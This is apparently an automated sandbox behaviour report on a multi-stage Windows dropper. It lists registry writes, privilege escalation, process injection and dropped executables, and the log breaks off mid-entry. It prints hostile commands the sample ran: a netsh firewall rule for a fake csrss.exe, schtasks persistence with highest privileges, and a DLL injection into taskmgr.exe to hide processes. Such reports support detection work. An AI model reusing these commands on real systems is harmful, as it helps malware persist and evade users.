Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	Info.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exe

pid	process
4292	pub2.exe
4292	pub2.exe
3540	jfiag3g_gg.exe
3540	jfiag3g_gg.exe
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216
2216

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

4292 pub2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SoCleanInst.exeInstall.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	4136	SoCleanInst.exe
Token: SeCreateTokenPrivilege	4972	Install.exe
Token: SeAssignPrimaryTokenPrivilege	4972	Install.exe
Token: SeLockMemoryPrivilege	4972	Install.exe
Token: SeIncreaseQuotaPrivilege	4972	Install.exe
Token: SeMachineAccountPrivilege	4972	Install.exe
Token: SeTcbPrivilege	4972	Install.exe
Token: SeSecurityPrivilege	4972	Install.exe
Token: SeTakeOwnershipPrivilege	4972	Install.exe
Token: SeLoadDriverPrivilege	4972	Install.exe
Token: SeSystemProfilePrivilege	4972	Install.exe
Token: SeSystemtimePrivilege	4972	Install.exe
Token: SeProfSingleProcessPrivilege	4972	Install.exe
Token: SeIncBasePriorityPrivilege	4972	Install.exe
Token: SeCreatePagefilePrivilege	4972	Install.exe
Token: SeCreatePermanentPrivilege	4972	Install.exe
Token: SeBackupPrivilege	4972	Install.exe
Token: SeRestorePrivilege	4972	Install.exe
Token: SeShutdownPrivilege	4972	Install.exe
Token: SeDebugPrivilege	4972	Install.exe
Token: SeAuditPrivilege	4972	Install.exe
Token: SeSystemEnvironmentPrivilege	4972	Install.exe
Token: SeChangeNotifyPrivilege	4972	Install.exe
Token: SeRemoteShutdownPrivilege	4972	Install.exe
Token: SeUndockPrivilege	4972	Install.exe
Token: SeSyncAgentPrivilege	4972	Install.exe
Token: SeEnableDelegationPrivilege	4972	Install.exe
Token: SeManageVolumePrivilege	4972	Install.exe
Token: SeImpersonatePrivilege	4972	Install.exe
Token: SeCreateGlobalPrivilege	4972	Install.exe
Token: 31	4972	Install.exe
Token: 32	4972	Install.exe
Token: 33	4972	Install.exe
Token: 34	4972	Install.exe
Token: 35	4972	Install.exe
Token: SeDebugPrivilege	2592	taskkill.exe
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216
Token: SeShutdownPrivilege	2216
Token: SeCreatePagefilePrivilege	2216

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

bcylemzAO4qDXd6pqS0laVSa.exePL7j4pRQF4MLUafa_hJonMjD.exejVbODZnSng89kIDwQa2GYabp.exeHogstkJZ7FRsznPeYYEJ2HPz.exeuTs9yKYb6SzJrTI1Rk3FjQl7.exe8our3GnN1MK8nVk9KvhYIFMu.execX4dN1L1ydZ1pLFIf8VaB8Ur.exeMfN_VZYkE5btMp7mOPU23HYJ.exefqG_utQ5KupwZRBNOoVuc18u.exe6KIaTjAnVAuAqNMgILerqRz5.exe

pid	process
4492	bcylemzAO4qDXd6pqS0laVSa.exe
3016	PL7j4pRQF4MLUafa_hJonMjD.exe
2212	jVbODZnSng89kIDwQa2GYabp.exe
3528	HogstkJZ7FRsznPeYYEJ2HPz.exe
5000
4848	uTs9yKYb6SzJrTI1Rk3FjQl7.exe
4236	8our3GnN1MK8nVk9KvhYIFMu.exe
2260	cX4dN1L1ydZ1pLFIf8VaB8Ur.exe
5092	MfN_VZYkE5btMp7mOPU23HYJ.exe
4040	fqG_utQ5KupwZRBNOoVuc18u.exe
5008	6KIaTjAnVAuAqNMgILerqRz5.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exeFolder.exeFiles.exeInstall.execmd.exerUNdlL32.eXesvchost.exeInfo.execmd.exeFile.exe

description	pid	process	target process
PID 2644 wrote to memory of 4408	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	md9_1sjm.exe
PID 2644 wrote to memory of 4408	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	md9_1sjm.exe
PID 2644 wrote to memory of 4408	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	md9_1sjm.exe
PID 2644 wrote to memory of 4136	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	SoCleanInst.exe
PID 2644 wrote to memory of 4136	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	SoCleanInst.exe
PID 2644 wrote to memory of 4032	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Folder.exe
PID 2644 wrote to memory of 4032	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Folder.exe
PID 2644 wrote to memory of 4032	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Folder.exe
PID 2644 wrote to memory of 1600	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Info.exe
PID 2644 wrote to memory of 1600	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Info.exe
PID 2644 wrote to memory of 1600	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Info.exe
PID 2644 wrote to memory of 1224	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Updbdate.exe
PID 2644 wrote to memory of 1224	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Updbdate.exe
PID 2644 wrote to memory of 1224	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Updbdate.exe
PID 2644 wrote to memory of 2320	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	File.exe
PID 2644 wrote to memory of 2320	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	File.exe
PID 2644 wrote to memory of 2320	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	File.exe
PID 2644 wrote to memory of 4972	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Install.exe
PID 2644 wrote to memory of 4972	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Install.exe
PID 2644 wrote to memory of 4972	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Install.exe
PID 2644 wrote to memory of 4292	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	pub2.exe
PID 2644 wrote to memory of 4292	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	pub2.exe
PID 2644 wrote to memory of 4292	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	pub2.exe
PID 2644 wrote to memory of 4384	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Files.exe
PID 2644 wrote to memory of 4384	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Files.exe
PID 2644 wrote to memory of 4384	2644	c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe	Files.exe
PID 4032 wrote to memory of 1192	4032	Folder.exe	Folder.exe
PID 4032 wrote to memory of 1192	4032	Folder.exe	Folder.exe
PID 4032 wrote to memory of 1192	4032	Folder.exe	Folder.exe
PID 4384 wrote to memory of 4200	4384	Files.exe	jfiag3g_gg.exe
PID 4384 wrote to memory of 4200	4384	Files.exe	jfiag3g_gg.exe
PID 4384 wrote to memory of 4200	4384	Files.exe	jfiag3g_gg.exe
PID 4972 wrote to memory of 4152	4972	Install.exe	cmd.exe
PID 4972 wrote to memory of 4152	4972	Install.exe	cmd.exe
PID 4972 wrote to memory of 4152	4972	Install.exe	cmd.exe
PID 4152 wrote to memory of 2592	4152	cmd.exe	taskkill.exe
PID 4152 wrote to memory of 2592	4152	cmd.exe	taskkill.exe
PID 4152 wrote to memory of 2592	4152	cmd.exe	taskkill.exe
PID 2972 wrote to memory of 2284	2972	rUNdlL32.eXe	rundll32.exe
PID 2972 wrote to memory of 2284	2972	rUNdlL32.eXe	rundll32.exe
PID 2972 wrote to memory of 2284	2972	rUNdlL32.eXe	rundll32.exe
PID 4384 wrote to memory of 3540	4384	Files.exe	jfiag3g_gg.exe
PID 4384 wrote to memory of 3540	4384	Files.exe	jfiag3g_gg.exe
PID 4384 wrote to memory of 3540	4384	Files.exe	jfiag3g_gg.exe
PID 3424 wrote to memory of 4164	3424	svchost.exe	Info.exe
PID 3424 wrote to memory of 4164	3424	svchost.exe	Info.exe
PID 3424 wrote to memory of 4164	3424	svchost.exe	Info.exe
PID 4164 wrote to memory of 1424	4164	Info.exe	cmd.exe
PID 4164 wrote to memory of 1424	4164	Info.exe	cmd.exe
PID 1424 wrote to memory of 3480	1424	cmd.exe	netsh.exe
PID 1424 wrote to memory of 3480	1424	cmd.exe	netsh.exe
PID 4164 wrote to memory of 4652	4164	Info.exe	csrss.exe
PID 4164 wrote to memory of 4652	4164	Info.exe	csrss.exe
PID 4164 wrote to memory of 4652	4164	Info.exe	csrss.exe
PID 3424 wrote to memory of 3544	3424	svchost.exe	schtasks.exe
PID 3424 wrote to memory of 3544	3424	svchost.exe	schtasks.exe
PID 2320 wrote to memory of 1072	2320	File.exe	Siyhjvx8roDNKlkVX5NDbA6H.exe
PID 2320 wrote to memory of 1072	2320	File.exe	Siyhjvx8roDNKlkVX5NDbA6H.exe
PID 2320 wrote to memory of 4492	2320	File.exe	bcylemzAO4qDXd6pqS0laVSa.exe
PID 2320 wrote to memory of 4492	2320	File.exe	bcylemzAO4qDXd6pqS0laVSa.exe
PID 2320 wrote to memory of 4492	2320	File.exe	bcylemzAO4qDXd6pqS0laVSa.exe
PID 2320 wrote to memory of 3016	2320	File.exe	PL7j4pRQF4MLUafa_hJonMjD.exe
PID 2320 wrote to memory of 3016	2320	File.exe	PL7j4pRQF4MLUafa_hJonMjD.exe
PID 2320 wrote to memory of 3016	2320	File.exe	PL7j4pRQF4MLUafa_hJonMjD.exe

C:\Users\Admin\AppData\Local\Temp\c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe
"C:\Users\Admin\AppData\Local\Temp\c8398db053244ff04c8d130b5ab242827cacd6d0960eee9302b0935d9ac497fb.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2644

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4408

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4136

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4032

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:1192

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
PID:1600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 368
3⤵
- Program crash
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 372
3⤵
- Program crash
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 372
3⤵
- Program crash
PID:5064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 680
3⤵
- Program crash
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 680
3⤵
- Program crash
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 680
3⤵
- Program crash
PID:4492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 728
3⤵
- Program crash
PID:3092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 736
3⤵
- Program crash
PID:2076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 748
3⤵
- Program crash
PID:3628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 640
3⤵
- Program crash
PID:1416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 856
3⤵
- Program crash
PID:1880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 856
3⤵
- Program crash
PID:1032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 808
3⤵
- Program crash
PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 808
3⤵
- Program crash
PID:2968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 876
3⤵
- Program crash
PID:420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 772
3⤵
- Program crash
PID:2340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 776
3⤵
- Program crash
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 880
3⤵
- Program crash
PID:4532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 896
3⤵
- Program crash
PID:628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 712
3⤵
- Program crash
PID:3060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 864
3⤵
- Program crash
PID:484

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 336
4⤵
- Program crash
PID:480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 340
4⤵
- Program crash
PID:1512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 348
4⤵
- Program crash
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 576
4⤵
- Program crash
PID:4632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 676
4⤵
- Program crash
PID:2972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 692
4⤵
- Program crash
PID:4988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 692
4⤵
- Program crash
PID:3512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 728
4⤵
- Program crash
PID:4484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 708
4⤵
- Program crash
PID:612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 784
4⤵
- Program crash
PID:4048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 776
4⤵
- Program crash
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 860
4⤵
- Program crash
PID:4588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 612
4⤵
- Program crash
PID:1192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 628
4⤵
- Program crash
PID:4228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 828
4⤵
- Program crash
PID:3476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 660
4⤵
- Program crash
PID:2276

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:1424

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:3480

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /94-94
4⤵
- Executes dropped EXE
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 368
5⤵
- Program crash
PID:1096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 392
5⤵
- Program crash
PID:2036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 396
5⤵
- Program crash
PID:3944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 664
5⤵
- Program crash
PID:1608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 664
5⤵
- Program crash
PID:2364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 684
5⤵
- Program crash
PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 684
5⤵
- Program crash
PID:3588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 732
5⤵
- Program crash
PID:2060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 760
5⤵
- Program crash
PID:548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 888
5⤵
- Program crash
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 748
5⤵
- Program crash
PID:3672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 856
5⤵
- Program crash
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 836
5⤵
- Program crash
PID:1876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 836
5⤵
- Program crash
PID:2284

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 980
5⤵
- Program crash
PID:3800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 952
5⤵
- Program crash
PID:4616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 748
5⤵
- Program crash
PID:4220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 1032
5⤵
- Program crash
PID:480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 976
5⤵
- Program crash
PID:1408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 912
5⤵
- Program crash
PID:1168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 948
5⤵
- Program crash
PID:5036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 1072
5⤵
- Program crash
PID:4116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 1096
5⤵
- Program crash
PID:4404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 988
5⤵
- Program crash
PID:3288

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:5040

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 1068
5⤵
PID:2732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 1036
5⤵
PID:3928

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:1224

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2320

C:\Users\Admin\Pictures\Adobe Films\Siyhjvx8roDNKlkVX5NDbA6H.exe
"C:\Users\Admin\Pictures\Adobe Films\Siyhjvx8roDNKlkVX5NDbA6H.exe"
3⤵
- Executes dropped EXE
PID:1072

C:\Users\Admin\Pictures\Adobe Films\bcylemzAO4qDXd6pqS0laVSa.exe
"C:\Users\Admin\Pictures\Adobe Films\bcylemzAO4qDXd6pqS0laVSa.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4492

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:3980

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2112

C:\Users\Admin\Documents\03XvsYgmNeES8wSASsJCnb0P.exe
"C:\Users\Admin\Documents\03XvsYgmNeES8wSASsJCnb0P.exe"
4⤵
PID:2428

C:\Users\Admin\Pictures\Adobe Films\J9WjFF0mlOhXxVwaQ7Ea6Gqb.exe
"C:\Users\Admin\Pictures\Adobe Films\J9WjFF0mlOhXxVwaQ7Ea6Gqb.exe"
5⤵
PID:5456

C:\Users\Admin\Pictures\Adobe Films\In9SZxXtRygv0kiDdgO3MmPv.exe
"C:\Users\Admin\Pictures\Adobe Films\In9SZxXtRygv0kiDdgO3MmPv.exe"
5⤵
PID:5872

C:\Users\Admin\AppData\Local\Temp\7zSB648.tmp\Install.exe
.\Install.exe
6⤵
PID:1736

C:\Users\Admin\AppData\Local\Temp\7zSDF0E.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
PID:5752

C:\Users\Admin\Pictures\Adobe Films\xCun5oTSnfKwvGBE78LifgJa.exe
